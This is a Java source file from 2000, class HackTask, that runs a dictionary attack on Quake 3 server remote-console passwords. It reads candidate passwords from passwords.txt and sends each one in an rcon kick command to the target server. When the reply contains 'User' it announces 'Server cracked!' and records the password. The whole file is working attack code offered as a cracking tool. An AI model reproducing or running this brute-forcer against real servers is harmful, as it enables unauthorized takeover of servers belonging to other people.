/*
 * Copyright (C) 2000 Free Software Foundation, Inc.
 * Brian Satterfield <legowhore@legowhore.com>, 2000.

 * this class is a modified version of a class called LongTask.java
 * available freely on Sun's website...
 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2, or (at your option)
 * any later version.
 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software Foundation,
 * Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */

package com.legowhore.q3;

import java.io.File;
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.Vector;

public class HackTask {
    public static int lengthOfTask;
    public static int current = 0;
    public static String statMessage;

    //  file to use 
    File dictionary;

    //  readers and streams
    FileReader fileReader; 
    BufferedReader bufferedReader;
    
    public static Vector words = new Vector();

    public static String password = "";

    public static Q3ServerKit q3Gui;

    HackTask(Q3ServerKit q3Gui) {
	this.q3Gui = q3Gui;
	current = 0;
      	dictionary = new File("passwords.txt");
        //Compute length of task...
	countWords();
    }

    private void countWords() {
	lengthOfTask = 0;
	try {
	    fileReader = new FileReader(dictionary);
	} catch (FileNotFoundException fnfe) {
	    db("Could not find file: password.txt");
	    return;
	}
	bufferedReader = new BufferedReader(fileReader);
	try {    
	    String word = bufferedReader.readLine();
	    while(word != null) {
		words.addElement(word);
		lengthOfTask++;
		word = bufferedReader.readLine();
	    }
	} catch (IOException ioe) {
	    db("Could not read file password.txt");
	    return;
	}
    }

    void go() {
        current = 0;
        final SwingWorker worker = new SwingWorker() {
            public Object construct() {
                return new ActualTask();
            }
        };
    }

    int getLengthOfTask() {
        return lengthOfTask;
    }

    int getCurrent() {
        return current;
    }

    void stop() {
        current = lengthOfTask;
    }

    boolean done() {
        if (current >= lengthOfTask)
            return true;
        else
            return false;
    }

    String getMessage() {
        return statMessage;
    }

    public static void db(String s) {
	System.err.println(s);
    }

    class ActualTask {
        ActualTask () {
            while (current < lengthOfTask && password.length() < 1) {
                    if (current > lengthOfTask) {
                        current = lengthOfTask;
                    }
		    String currentWord = (String) words.elementAt(current);
                    statMessage = "Checking: " + currentWord;
		    q3Gui.q3Client.setPassword(currentWord);
		    String command = ("xxxxrcon" + " " + currentWord 
				      + " kick test");
		    String response = q3Gui.q3Client.getInfo(command);
		    if(response == null) {
			db("Could not contact server.");
			break;
		    }
		    if(response.indexOf("User") >= 0) {
			statMessage = ("\n-------------\n"
				       + "\nServer cracked!\n"
				       + "Password: " + currentWord);
			password = currentWord;
			current = lengthOfTask;
			break;
		    }
		    current++;
            }
        }
    }
}
